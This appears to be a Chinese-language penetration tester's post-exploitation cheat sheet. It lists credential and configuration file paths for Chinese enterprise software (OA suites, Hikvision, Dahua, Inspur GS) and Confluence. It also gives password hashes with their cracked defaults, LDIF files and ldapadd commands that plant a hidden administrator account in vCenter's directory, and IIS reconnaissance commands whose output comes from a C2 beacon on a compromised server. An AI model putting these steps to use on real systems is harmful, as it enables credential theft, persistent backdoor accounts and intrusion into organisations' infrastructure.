相关配置路径

禅道CMS

获取版本信息：

http://site.com/zentao/index.php?mode=getconfig

海康威视 - 综合安防

配置文件路径：/opt/hikvision/web/opsMgrCenter/conf/config.properties

宏景HCRM

在Tomcat目录下的config文件夹内，名字为system.properties。

蓝凌OA

数据库配置文件：/home/ekp/ekp/WEB-INF/KmssConfig/kmssconfig.properties 数据库用户表：sys_org_person，数据库密码加密方式MD5，密码列为fd_password

泛微OA

数据库配置文件：/WEB-INF/prop/weaver.properties 数据库用户表：HrmResource，管理员表是HrmResourceManager账户是sysadmin

Confluence

数据库路径：/var/atlassian/application-data/confluence/confluence.cfg.xml

瑞友天翼 - 应用虚拟化系统

获取版本信息：

http://site.com/RapAgent.xgi?CMD=GetRegInfo

大华视频监控

配置文件是/opt/evo/evo-common/evo-brm/config/application-config.properties和/opt/evo/evo-common/evo-brm/config/application-config.properties。

数据库是evo_brm，表名为user，密码有加密。

浪潮GS

默认账号密码为个人自己设置 9999:Abcd1234

SELECT CODE,NAME,PASSWORD from LCdb9999.GSPUSER;
9999 超级管理员 tE3aHa3TUZSPys4YVu2XNm5nkjk= [Abcd1234]
anonymous 匿名用户 96niR3fsIyEsVNejULxb6lR3/bs= [aaaaaa]
GSPScheduler 调度管理员 U1Bb5W2DFneiZvEO/LRWxd+9jBw= [aaaaaaA1]

默认数据库文件路径 C:/Program Files/GenerSoft/bscw_local/gsp/config/GSPUniversalConfiguration.config

<GSPDbConfigurations>
  <add type="Genersoft.Platform.Core.DataAccess.Configuration.SqlDbConfigData, Genersoft.Platform.Core.DataAccess, Version=3.0.10916.0, Culture=neutral, PublicKeyToken=4dc42cef6d943894"
	DbType="SQLServer" Code="db" ConfigName="GSP的数据库连接配置" UserId="LCdb9999"
	Password="68Yp/olrrPU8NYUToO4uEQ==" Source="127.0.0.1" Provider=""
	Catalog="cwbasedbs" ConnectTimeout="120000" CommandTimeout="600000"
	DisplayName="db" Visible="true" name="db" />
</GSPDbConfigurations>

用户表：

SELECT CODE,NAME,PASSWORD from LCdb9999.GSPUSER;
9999 超级管理员 tE3aHa3TUZSPys4YVu2XNm5nkjk= [Abcd1234]
anonymous 匿名用户 96niR3fsIyEsVNejULxb6lR3/bs= [aaaaaa]
GSPScheduler 调度管理员 U1Bb5W2DFneiZvEO/LRWxd+9jBw= [aaaaaaA1]

VCenter

LDAP配置

Linux执行：

/opt/likewise/bin/lwregshell list_values '[HKEY_THIS_MACHINE\\services\\vmdir]'

Windows执行：

reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\VMwareDirectoryService

LDAP管理员添加

adduser

dn: CN=vcadmin,CN=Users,DC=vsphere,dc=local
userPrincipalName: vcadmin@vsphere.local
sAMAccountName: vcadmin
cn: vcadmin
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
userPassword: G%2kX@PjYn%Jy$Nb

addadmin:

dn: cn=Administrators,cn=Builtin,dc=vsphere,dc=local
changetype: modify
add: member
member: CN=vcadmin,CN=Users,DC=vsphere,dc=local

先后执行：

ldapadd -x -h 10.62.105.192 -D "cn=10.62.105.192,ou=Domain Controllers,dc=vsphere,dc=local" -w "dcAccountPassword" -f adduser.ldif
ldapadd -x -h 10.62.105.192 -D "cn=10.62.105.192,ou=Domain Controllers,dc=vsphere,dc=local" -w "dcAccountPassword" -f addadmin.ldif

格式为：

ldapadd -x -h {dcAccount} -D \"{dcAccountDN}\" -w '{dcAccountPassword}' -f adduser.ldif

IIS

确定IIS物理路径

WMIC

使用WMIC获取命令行参数即可：

wmic process get caption, commandline

找w3wp进程：

w3wp.exe              C:\Windows\SysWOW64\inetsrv\w3wp.exe -ap "XSWWW" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipmb2f00372-f870-4d32-9ad7-e420989029d6 -h "C:\inetpub\temp\apppools\XSWWW\XSWWW.config" -w "" -m 0 -t 20 -ta 0

由输出可以看到对应的IIS配置，读取这个配置文件就可以确定物理路径了。

AppCmd

这个程序一般在C:\Windows\SysWOW64\inetsrv，使用icalcs可以查看其ACL为：

appcmd.exe  NT SERVICE\TrustedInstaller:(F)
			BUILTIN\Administrators:(RX)
			NT AUTHORITY\SYSTEM:(RX)
			BUILTIN\Users:(RX)
			APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)

执行需要较高权限才可以，如果提了权倒是挺好。

列出网站目录：

C:\Windows\SysWOW64\inetsrv\appcmd.exe list VDIR

可能得到输出如下：

VDIR "Default Web Site/" (physicalPath:%SystemDrive%\inetpub\wwwroot)
VDIR "FTP/" (physicalPath:\\192.168.0.219\MH_S_X011_soft\)
VDIR "MHWWW/" (physicalPath:D:\DATA\mhwww\newwww)
VDIR "BPM/" (physicalPath:D:\DATA\BPM\WebApplication)
VDIR "BPM/BPM_files" (physicalPath:\\192.168.0.219\MH_S_X011_soft\BPM_files)
VDIR "EDI/" (physicalPath:D:\DATA\EDI\web)
VDIR "xiwuswww/" (physicalPath:D:\DATA\xiwuwww\xiwu)
VDIR "XSWWW/" (physicalPath:D:\DATA\xswww\xsdl\public)

列出端口：

%windir%\system32\inetsrv\appcmd.exe list site
 
\system32\inetsrv\appcmd.exe list site
[+] host called home, sent: 56 bytes
[+] received output:
SITE "emip" (id:2,bindings:http/*:8084:,https/*:8085:,state:Started)
SITE "cc" (id:1,bindings:http/*:8083:,state:Started)
SITE "baozhuangapp" (id:4,bindings:http/*:8089:,state:Stopped)
SITE "baozhuang" (id:3,bindings:http/*:8088:,state:Stopped)